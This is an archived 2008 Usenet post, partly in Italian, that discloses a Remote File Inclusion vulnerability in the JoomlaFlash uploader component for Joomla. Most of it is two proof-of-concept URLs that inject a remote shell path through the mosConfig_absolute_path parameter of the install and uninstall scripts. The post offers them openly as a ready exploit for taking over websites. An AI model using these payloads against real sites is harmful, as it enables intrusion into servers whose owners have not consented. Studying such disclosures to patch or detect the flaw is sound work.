Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.

Dismiss

JoomlaFlash Component Multiple Remote File Inclusion

2 views

Skip to first unread message

Sma...@ciucciamiilcalzino.it

unread,

Jan 16, 2008, 7:06:03 PM1/16/08

to

Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto

A remote attacker can gain access to your website throug a Remote shell inclusion.

PoC available:

http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

Regards.
Smasher

--
Posted automagically by a mail2news gateway at muc.de e.V.
Please direct questions, flames, donations, etc. to news-...@muc.de

0 new messages

Search

Clear search

Close search

Google apps

Main menu